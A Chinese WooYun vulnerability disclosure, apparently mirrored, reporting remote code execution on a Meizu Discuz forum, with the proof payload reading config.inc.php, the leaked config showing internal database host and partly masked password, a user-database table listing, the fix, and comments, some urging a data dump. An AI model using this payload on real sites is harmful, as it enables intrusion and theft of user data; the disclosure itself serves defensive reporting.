魅族科技某分站存在远程代码执行漏洞(千万用户信息受影响)

admin
admin
admin
146004
文章
119
评论
2015年7月19日18:06:30评论190 views字数 232阅读0分46秒阅读模式
摘要

2014-10-26: 细节已通知厂商并且等待厂商处理中
2014-10-26: 厂商已经确认,细节仅向厂商公开
2014-11-05: 细节向核心白帽子及相关领域专家公开
2014-11-15: 细节向普通白帽子公开
2014-11-25: 细节向实习白帽子公开
2014-12-01: 厂商已经修复漏洞并主动公开,细节向公众公开

漏洞概要 关注数(63) 关注此漏洞

缺陷编号: WooYun-2014-80884

漏洞标题: 魅族科技某分站存在远程代码执行漏洞(千万用户信息受影响)

相关厂商: 魅族科技

漏洞作者: 猪猪侠魅族科技某分站存在远程代码执行漏洞(千万用户信息受影响)

提交时间: 2014-10-26 18:05

修复时间: 2014-12-01 10:06

公开时间: 2014-12-01 10:06

漏洞类型: 应用配置错误

危害等级: 高

自评Rank: 20

漏洞状态: 厂商已经修复

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: 配置错误

9人收藏

漏洞详情

披露状态:

2014-10-26: 细节已通知厂商并且等待厂商处理中
2014-10-26: 厂商已经确认,细节仅向厂商公开
2014-11-05: 细节向核心白帽子及相关领域专家公开
2014-11-15: 细节向普通白帽子公开
2014-11-25: 细节向实习白帽子公开
2014-12-01: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

魅族科技某分站远程代码执行漏洞(千万用户信息受影响)

详细说明:

code 区域 
影响网站:
 http://forum.meizu.com/
 Disucz ucenter 用户将近1000万
mask 区域 
**********
 1.http://**.**.**/dzvul/sodb/19/sodb-2010-01.txt

魅族科技某分站存在远程代码执行漏洞(千万用户信息受影响)

漏洞证明:

魅族科技某分站存在远程代码执行漏洞(千万用户信息受影响)

cmd=echo readfile('./config.inc.php');

code 区域 
<?php
 //UTF8转码
 /*
  [Discuz!] (C)2001-2006 Comsenz Inc.
  This is NOT a freeware, use is subject to license terms
 
  $RCSfile: config5.inc.php,v $
  $Revision: 1.9 $
  $Date: 2007/01/26 01:11:32 $ 
 */
 
 // [CH] 以下变量请根据空间商提供的账号参数修改,如有疑问,请联系服务器提供商
 
  $dbhost = '192.168.**.**';   // 数据库服务器
  $dbuser = 'meizu_**bbs';   // 数据库用户名
  $dbpw = 'wdw5NR*****aAhW';    // 数据库密码
  $dbname = 'meizu_enbbs';   // 数据库名
  $pconnect = 0;    // 数据库持久连接 0=关闭, 1=打开
 
 // [CH] 如您对 cookie 作用范围有特殊要求, 或论坛登录不正常, 请修改下面变量, 否则请保持默认
 
  $cookiepre = 'dZJ_';   // cookie 前缀
  $cookiedomain = '';    // cookie 作用域
  $cookiepath = '/';   // cookie 作用路径
 
 // [CH] 论坛投入使用后不能修改的变量
 
  $tablepre = 'cdb_';      // 表名前缀, 同一数据库安装多个论坛请修改此处
 
 // [CH] 小心修改以下变量, 否则可能导致论坛无法正常使用
 
  $database = 'mysql';   // 论坛数据库类型,请勿修改
  $dbcharset = '';   // MySQL 字符集, 可选 'gbk', 'big5', 'utf8', 'latin1', 留空为按照论坛字符集设定
 
  $charset = 'utf-8';   // 论坛页面默认字符集, 可选 'gbk', 'big5', 'utf-8'
  $headercharset = 0;   // 强制论坛页面使用默认字符集,可避免部分服务器空间页面出现乱码,一般无需开启。 0=关闭 1= 开启
 
  $tplrefresh = 1;   // 论坛风格模板自动刷新开关 0=关闭, 1=打开。
 
  
 // [CH] 论坛安全设置, 调整以下设置,可以增强论坛的安全性能和防御性能
 
  $adminemail = '';  // 系统管理员 Email
code 区域 
[SHOW TABLES FROM `meizu_user`]
 -------------------- - 
 Tables_in_meizu_user | 
 -------------------- - 
 
 TMP_VCH_02bea2a76c1f4f2491ae58252cbcfc71875 | 
 TMP_VCH_0952588bd0904304a66e5db830d70853224 | 
 TMP_VCH_131a1deb65bf4ab0b75dff6fa00c71c6923 | 
 TMP_VCH_2ee3064b952241e694fcc5704dd37c286 | 
 TMP_VCH_31ef36f285804af7a48bb939d7cc93a4544 | 
 TMP_VCH_326901080e2d4cf8a85586e29f41f18065 | 
 TMP_VCH_3cbe635e43be490296dbdc769d9e6774657 | 
 TMP_VCH_3fcd7a5ee099423ba2383f459c8e0e98744 | 
 TMP_VCH_530da630629843f6acd070b435bc7045572 | 
 TMP_VCH_6fb938aba3ac4d34a3b156eefd6e7805262 | 
 TMP_VCH_8a33e169514241ed9c8abbd76733b55a187 | 
 TMP_VCH_8aae9628d37f44c785090f0a67e3a16f692 | 
 TMP_VCH_9077238e556a4a068d54a5aee0b5113b846 | 
 TMP_VCH_a28ce46669ef4c89b0eecd23c0cca09d778 | 
 TMP_VCH_a58b7ec518b443048d0ffce7efdc3e0b311 | 
 TMP_VCH_b84f960d9531447196fae440b2207791691 | 
 TMP_VCH_bdfb1492eba54967a1c5ef6e09a44424884 | 
 TMP_VCH_d02e1d2e1f8c4c819931ce72a4d3c571927 | 
 TMP_VCH_d7b21c017ff4415cb8c584d524cf3498975 | 
 T_APP_PRODUCT_ORDER | 
 T_AUTH_GRANT | 
 T_AUTH_OAUTH | 
 T_AUTH_RESOURCE | 
 T_AUTH_ROLE | 
 T_AUTH_ROLE_RESOURCE | 
 T_AUTH_USER | 
 T_BBS_DONATE_PERSON | 
 T_BBS_TITLE_INFO | 
 T_BS_BASEDATA | 
 T_BS_BASEDATA_LANG | 
 T_BS_BASEDATA_TYPE | 
 T_BS_GENERATECODE | 
 T_BS_GENERATECODE_LAST | 
 T_BS_IDENTITY | 
 T_BS_LOG | 
 T_BS_LOGINFAIL | 
 T_BS_LOGIN_URL | 
 T_BS_PARAMETER | 
 T_BS_PUSH_ROUTER | 
 T_BS_PWDKEY | 
 T_BS_REFERBD | 
 T_FNBL_CATEGORY | 
 T_UC_ACCOUNT | 
 T_UC_ACCOUNT_bak | 
 T_UC_BAL_0424 | 
 T_UC_BAL_CHANGE_0424 | 
 T_UC_BILL | 
 T_UC_BILL_LOSTDATA_0424 | 
 T_UC_CHECKACCOUT_0424 | 
 T_UC_DONATE_0424 | 
 T_UC_LOGIN_VALIDCODE | 
 T_UC_MEMBERS_ACTIVE | 
 T_UC_MEMBERS_EXT | 
 T_UC_MEMBERS_MODIFY_ACTIVED_EMAIL | 
 T_UC_MEMBERS_VERIFICATION_CODE | 
 T_UC_MEMBER_DONATE | 
 T_UC_MEMBER_SN | 
 T_UC_MEMBER_SN_TMP | 
 T_UC_PAYMENT | 
 T_UC_PAYMENT_0424 | 
 T_UC_PAYMENT_APPEAL_0424 | 
 T_UC_PAYMENT_TEMP_0424 | 
 T_UC_PAYMENT_tmp | 
 T_UC_TICKET | 
 T_UC_USER_BAL | 
 T_UC_VOUCHER_ENTRY_LOSTDATA | 
 T_UC_VOUCHER_ENTRY_tmp | 
 admin | 
 all_sn_1_tmp | 
 all_sn_2_tmp | 
 exists_sn_tmp | 
 exists_sn_tmp2 | 
 imsi_card | 
 meizu_device | 
 no_exists_sn_tmp | 
 no_exists_sn_tmp2 | 
 not_update_id_tmp | 
 online_meizu_device | 
 online_meizu_device_20140630_bak | 
 online_meizu_device_20140710_bak | 
 online_meizu_device_BAK_0711 | 
 to_delete_id_tmp | 
 uc_admins | 
 uc_applications | 
 uc_badwords | 
 uc_create_members | 
 uc_domains | 
 uc_events | 
 uc_failedlogins | 
 uc_feeds | 
 uc_friends | 
 uc_mailqueue | 
 uc_memberfields | 
 uc_members | 
 uc_mergemembers | 
 uc_newpm | 
 uc_notelist | 
 uc_pm_indexes | 
 uc_pm_lists | 
 uc_pm_members | 
 uc_pm_messages_0 | 
 uc_pm_messages_1 | 
 uc_pm_messages_2 | 
 uc_pm_messages_3 | 
 uc_pm_messages_4 | 
 uc_pm_messages_5 | 
 uc_pm_messages_6 | 
 uc_pm_messages_7 | 
 uc_pm_messages_8 | 
 uc_pm_messages_9 | 
 uc_pms | 
 uc_protectedmembers | 
 uc_settings | 
 uc_sqlcache | 
 uc_tags | 
 uc_user_answer | 
 uc_user_setting | 
 uc_vars | 
 user_nickname_locus |

修复方案:

更改php.ini

设置: request_order为GPC

版权声明:转载请注明来源 猪猪侠@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2014-10-26 18:35

厂商回复:

厂商正在处理

最新状态:

2014-12-01:此漏洞已修复。

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

  1. 2014-10-26 18:06 | 郭斯特 ( 普通白帽子 | Rank:185 漏洞数:71 | GhostWin)

    1

    一楼?

  2. 2014-10-26 18:08 | 老笨蛋 ( 路人 | Rank:29 漏洞数:8 | 老笨蛋一个)

    0

    地板……爽。

  3. 2014-10-26 18:08 | 咖啡 ( 实习白帽子 | Rank:62 漏洞数:23 )

    0

    二楼?

  4. 2014-10-26 18:11 | 冷静 ( 路人 | Rank:3 漏洞数:2 )

    0

    三楼?

  5. 2014-10-26 18:16 | 安然意境 ( 普通白帽子 | Rank:194 漏洞数:83 | 暗室中很难找到黑猫,尤其当里面根本没猫的...)

    0

    五楼。

  6. 2014-10-26 18:19 | YY-2012 ( 核心白帽子 | Rank:3861 漏洞数:736 | 意淫,是《红楼梦》原创的词汇,但后来演变...)

    0

    一亿九万四十五楼

  7. 2014-10-26 18:24 | 子非海绵宝宝 魅族科技某分站存在远程代码执行漏洞(千万用户信息受影响) ( 核心白帽子 | Rank:1413 漏洞数:148 | 发扬海绵宝宝的精神! 你不是海绵宝宝,你怎...)

    0

    前排

  8. 2014-10-26 18:36 | 子非海绵宝宝 魅族科技某分站存在远程代码执行漏洞(千万用户信息受影响) ( 核心白帽子 | Rank:1413 漏洞数:148 | 发扬海绵宝宝的精神! 你不是海绵宝宝,你怎...)

    0

    就5RANK?

  9. 2014-10-26 18:40 | 猪猪侠 魅族科技某分站存在远程代码执行漏洞(千万用户信息受影响) ( 核心白帽子 | Rank:5372 漏洞数:415 | 你都有那么多超级棒棒糖了,还要自由干吗?)

    2

    @子非海绵宝宝 是的,如你所见,所有用户的信息+手机信息只值5RANK

  10. 2014-10-26 18:43 | 子非海绵宝宝 魅族科技某分站存在远程代码执行漏洞(千万用户信息受影响) ( 核心白帽子 | Rank:1413 漏洞数:148 | 发扬海绵宝宝的精神! 你不是海绵宝宝,你怎...)

    1

    @猪猪侠 @魅族科技 其实我觉得并不是认为给的少 按照比例1:10其实也就100多块钱 并不是缺这个钱 而是白帽子的努力得不到肯定

  11. 2014-10-26 18:54 | 咸鱼翻身 ( 普通白帽子 | Rank:630 漏洞数:124 )

    0

    下次拔裤子。。。。

  12. 2014-10-26 20:42 | 写个七 ( 路人 | Rank:4 漏洞数:1 | 一点一点积累。)

    0

    自己利用可好? 魅族很坑人 屏幕坏了要600RMB修 操。 都可以换个新的了。

  13. 2014-10-26 20:43 | 写个七 ( 路人 | Rank:4 漏洞数:1 | 一点一点积累。)

    0

    @猪猪侠 脱裤好吗 猪哥

  14. 2014-10-26 21:40 | 酸奶、 ( 普通白帽子 | Rank:290 漏洞数:55 )

    0

    煤油飘过。不过说实话,rank的确少。

  15. 2014-10-26 22:19 | 老笨蛋 ( 路人 | Rank:29 漏洞数:8 | 老笨蛋一个)

    0

    猪猪侠,光一次腚吧。总见裤子不见腚,干过瘾啊。

  16. 2014-10-26 23:42 | px1624 ( 普通白帽子 | Rank:1171 漏洞数:207 | px1624)

    1

    @猪猪侠 5rank,50块。也就是说魅族几千万用户(应该是几千万吧,没去核实过)的数据才值50块,那么一条就是1W条数据大概1分钱左右,哈哈、、、

  17. 2014-10-27 09:31 | Neeke ( 普通白帽子 | Rank:110 漏洞数:26 | 额滴歌神呀!)

    0

    是ROS吧?

  18. 2014-10-27 11:37 | papaver ( 普通白帽子 | Rank:198 漏洞数:36 | 95后,高一学生一枚... 萌萌哒..)

    0

    哈哈 魅族果然 。。。

  19. 2014-10-27 11:40 | 第四维度 ( 实习白帽子 | Rank:90 漏洞数:45 | 将点成线...)

    0

    安全的悲哀

  20. 2014-10-27 19:01 | 雷锋 ( 路人 | Rank:12 漏洞数:2 | 看人生万般无奈,看世间千姿百态...)

    1

    猪猪侠去小米了??

  21. 2014-10-27 23:57 | 小火苗 ( 路人 | Rank:6 漏洞数:1 | 我是一只小火苗呀,春风吹又生呀...)

    0

    这厂商太浮夸。!

  22. 2014-10-28 20:49 | leakless ( 路人 | Rank:6 漏洞数:3 | 今天我没吃药感觉自己萌萌哒~~)

    0

    下次再有这情况直接发裤子。。遇到这种厂商也是服了。。

  23. 2014-10-28 20:49 | leakless ( 路人 | Rank:6 漏洞数:3 | 今天我没吃药感觉自己萌萌哒~~)

    0

    下次再有这情况直接发裤子。。遇到这种厂商也是服了。。

  24. 2014-10-29 18:40 | Mixes ( 普通白帽子 | Rank:116 漏洞数:20 | :))

    0

    @猪猪侠 因为库被脱了.

  25. 2014-11-08 22:59 | 刘海哥 ( 普通白帽子 | Rank:135 漏洞数:30 | 索要联系方式但不送礼物的厂商定义为无良厂...)

    0

    楼上真相?

  26. 2014-11-26 10:19 | 黑吃黑 ( 普通白帽子 | Rank:165 漏洞数:32 | 不是因为看到了希望才去努力,而是努力了才...)

    1

    @猪猪侠 魅族真大方

  27. 2014-12-01 11:03 | Woodee ( 路人 | 还没有发布任何漏洞 | 乌云路人甲,打脸pa pa pa)

    1

    魅族的节操呢??

  28. 2014-12-01 16:07 | 【|→上善若水】 ( 普通白帽子 | Rank:127 漏洞数:25 | 【|→上善若水】)

    1

    @猪猪侠 大神,这个漏洞是什么原理呢?

  29. 2014-12-07 13:00 | 廷廷 ( 路人 | Rank:0 漏洞数:1 | 有很强的好奇心,爱好广泛,求女女带走。。...)

    1

    @【|→上善若水】 http://www.80vul.com/dzvul/sodb/19/sodb-2010-01.txt 参照这个

  30. 2014-12-07 22:54 | 【|→上善若水】 ( 普通白帽子 | Rank:127 漏洞数:25 | 【|→上善若水】)

    1

    @廷廷 thanks

  31. 2014-12-22 13:11 | Cpt.Tony ( 路人 | Rank:0 漏洞数:1 | 兴趣)

    1

    QQ邮箱好评

  32. 2015-06-25 16:42 | 魅族科技(乌云厂商)

    0

    @猪猪侠 非常感谢白帽子猪猪侠对魅族安全做出的贡献,我司安全部门刚刚成立不久,接管魅族厂商帐号之后,确实觉得之前的漏洞确认和评分不尽人意,特地申请了一批手机,一则感谢白帽子提供漏洞,二则反馈Wooyun社区,届时乌云管理员会联系你提供地址的,再次感谢您对魅族安全的关注。

  33. 2015-06-25 17:03 | px1624 ( 普通白帽子 | Rank:1171 漏洞数:207 | px1624)

    0

    @魅族科技 俺有么有?心不黑,求一个魅蓝note2电信版。

  34. 2015-06-25 17:12 | 魅族科技(乌云厂商)

    0

    @px1624 赞助了几台给乌云市场,敬请关注。

  35. 2015-06-25 20:49 | px1624 ( 普通白帽子 | Rank:1171 漏洞数:207 | px1624)

    0

    @魅族科技 。。。还要买啊!?还以为是奖励给提交过魅族漏洞的白帽子呢

  36. 2015-06-25 22:13 | he1renyagao ( 普通白帽子 | Rank:235 漏洞数:31 | 是金子总会发光,在还未发光之前,先磨磨)

    0

    @魅族科技 有点想去你们那边,能聊聊吗?

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin